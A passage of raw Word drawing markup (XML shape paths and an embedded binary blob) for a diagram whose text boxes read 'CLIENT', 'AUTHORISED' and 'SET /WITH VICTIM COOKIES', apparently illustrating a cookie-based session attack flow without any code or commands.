                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1479" name="Shape 1479"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4390466" y="698806"/>
                            <a:ext cx="81738" cy="81506"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="81738" h="81506">
                                <a:moveTo>
                                  <a:pt x="81738" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="81738" y="81506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="40753"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8173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49603" name="Shape 49603"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4113672" y="2398018"/>
                            <a:ext cx="1047259" cy="111143"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1047259" h="111143">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1047259" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1047259" y="111143"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="11114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81" name="Rectangle 1481"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4115412" y="2414240"/>
                            <a:ext cx="1398090" cy="125863"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="35D22A42" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="3D64AC"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>SET /WITH VICTIM COOKIES</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1482" name="Shape 1482"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2490518" y="1067782"/>
                            <a:ext cx="1570905" cy="1159316"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1570905" h="1159316">
                                <a:moveTo>
                                  <a:pt x="1570905" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1570905" y="984507"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="984507"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1159316"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="11578" cap="rnd">
                            <a:round/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="1">
                            <a:srgbClr val="FF0000"/>
                          </a:lnRef>
                          <a:fillRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1483" name="Shape 1483"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2449649" y="2216910"/>
                            <a:ext cx="81738" cy="81506"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="81738" h="81506">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="81738" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="40869" y="81506"/>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484" name="Shape 1484"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3397766" y="1996718"/>
                            <a:ext cx="496977" cy="111143"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="496977" h="111143">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="496977" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="496977" y="111143"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="111143"/>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85" name="Rectangle 1485"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3398694" y="2012706"/>
                            <a:ext cx="664377" cy="125470"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="10CFE5A4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="3D64AC"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>AUTHORISED</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1486" name="Rectangle 1486"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5798699" y="2751182"/>
                            <a:ext cx="50673" cy="224380"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="091C5206" w14:textId="77777777" w:rsidR="00F97B5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C8CC4F4" id="Group 40468" o:spid="_x0000_s1049" style="width:459.6pt;height:229.9pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="58367,29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&#10;">
                <v:shape id="Shape 1439" o:spid="_x0000_s1050" style="position:absolute;left:8449;top:5755;width:6583;height:3282;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="658236,32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vDxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE89b8Iw&#10;EN2R+A/WIXVrbKBNIcUghNSWoUtTBsZTfE2ixOcoNiT993UlJLZ7ep+32Y22FVfqfe1YwzxRIIgL&#10;Z2ouNZy+3x5XIHxANtg6Jg2/5GG3nU42mBk38Bdd81CKGMI+Qw1VCF0mpS8qsugT1xFH7sf1FkOE&#10;fSlNj0MMt61cKJVKizXHhgo7OlRUNPnFang5rz/dsG/K5/RdpYf2Q61s3mj9MBv3ryACjeEuvrmP&#10;Js5/Wq7h/5t4gtz+AQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJuhi8PEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,l658236,r,328177l,328177,,xe" fillcolor="#4672c4" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,658236,328177"/>
                </v:shape>
                <v:shape id="Shape 1440" o:spid="_x0000_s1051" style="position:absolute;left:8449;top:5755;width:6583;height:3282;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="658236,32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uxyAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;EIXvBf/DMkJvdaOVElJXUdG2B6kYC7kO2WkSmp1Ns6um/75zKPQ2w3vz3jeL1eBadaU+NJ4NTCcJ&#10;KOLS24YrAx/n/UMKKkRki61nMvBDAVbL0d0CM+tvfKJrHislIRwyNFDH2GVah7Imh2HiO2LRPn3v&#10;MMraV9r2eJNw1+pZkjxphw1LQ40dbWsqv/KLM1DsXmxavB/ydHc4fm9mj6+X/akw5n48rJ9BRRri&#10;v/nv+s0K/nwu/PKNjKCXvwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCtYfuxyAAAAN0A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" path="m,328177r658236,l658236,,,,,328177xe" filled="f" strokecolor="#c8c8c8" strokeweight=".08039mm">
                  <v:stroke miterlimit="83231f" joinstyle="miter" endcap="square"/>
                  <v:path arrowok="t" textboxrect="0,0,658236,328177"/>
                </v:shape>
                <v:rect id="Rectangle 1441" o:spid="_x0000_s1052" style="position:absolute;left:10414;top:6978;width:3474;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429E5AB1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:color w:val="FEFFFF"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>CLIENT</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1442" o:spid="_x0000_s1053" style="position:absolute;left:21538;top:22158;width:6681;height:6754;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="668186,67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8RwgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0v+B/CCN7W1CJFq1FUWCh4Wt3L3sZmbIrNpDTZWv31ZmFhb/N4n7PeDrYRPXW+dqxgNk1AEJdO&#10;11wp+Dp/vC9A+ICssXFMCh7kYbsZva0x1+7On9SfQiViCPscFZgQ2lxKXxqy6KeuJY7c1XUWQ4Rd&#10;JXWH9xhuG5kmSSYt1hwbDLZ0MFTeTj9WwfclFFmSPmc+K/pjv1ju5fNslJqMh90KRKAh/Iv/3IWO&#10;8+fzFH6/iSfIzQsAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCQYz8RwgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m486017,574c524985,,562385,24619,579017,66255v55615,33517,89169,98664,86731,168268c643456,280231,615707,322385,583430,359410v32973,32521,51666,80533,49344,126774c620235,527423,586100,552048,551152,545241v-26124,46300,-70940,70394,-115873,62342c433537,607765,431680,607765,429938,607583v-17416,-1811,-30420,-20909,-28910,-42653c393481,595301,377226,621204,355515,637784,306053,675407,241499,656010,211312,594459v-9289,5670,-19274,8929,-29607,9581c139907,606683,104379,566658,102289,514641,55730,513206,16719,475926,8940,425622,,367433,35760,312312,88821,302494,61304,260503,57704,207188,79416,165116,110880,104356,184607,85775,244053,123610v7547,-11369,17184,-21094,28446,-28434c313600,68362,365151,78921,387676,118747,384425,72252,408343,28582,447238,9849,459864,3756,473028,766,486017,574xe" fillcolor="red" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter" endcap="square"/>
                  <v:path arrowok="t" textboxrect="0,0,668186,675407"/>
                </v:shape>
                <v:shape id="Shape 1443" o:spid="_x0000_s1054" style="position:absolute;left:21538;top:22012;width:6681;height:6900;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="668186,68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5u6xAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCF6KbmoXW6KrVLHQ3jQVeh2zYxLNzobsNkn/fbdQ6G0e73NWm8HWoqPWV441PMwSEMS5&#10;MxUXGk4fr9NnED4gG6wdk4Zv8rBZj+5WmBrX85G6LBQihrBPUUMZQpNK6fOSLPqZa4gjd3GtxRBh&#10;W0jTYh/DbS3nSbKQFiuODSU2tCspv2VfVoPKDuqqznn3dP2s5X3zvu+r7V7ryXh4WYIINIR/8Z/7&#10;zcT5Sj3C7zfxBLn+AQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhABenm7rEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m102289,529163v2090,52017,37618,92041,79416,89398c192038,617909,202023,614650,211312,608981v30187,61551,94741,80948,144203,43325c377226,635726,393481,609822,401028,579451v-1510,21745,11494,40842,28910,42654c431680,622287,433537,622287,435279,622105v44933,8051,89749,-16042,115873,-62343c586100,566570,620235,541944,632774,500705v2322,-46240,-16371,-94252,-49344,-126774c615707,336906,643456,294753,665748,249044,668186,179440,634632,114293,579017,80776,556841,25262,497743,,447238,24371,408343,43103,384425,86774,387676,133269,365151,93442,313600,82884,272499,109697v-11262,7340,-20899,17065,-28446,28434c184607,100296,110880,118878,79416,179637v-21712,42073,-18112,95387,9405,137379c35760,326834,,381955,8940,440143v7779,50305,46790,87584,93349,89020xe" filled="f" strokecolor="red" strokeweight=".08039mm">
                  <v:stroke miterlimit="83231f" joinstyle="miter" endcap="square"/>
                  <v:path arrowok="t" textboxrect="0,0,668186,689929"/>
                </v:shape>
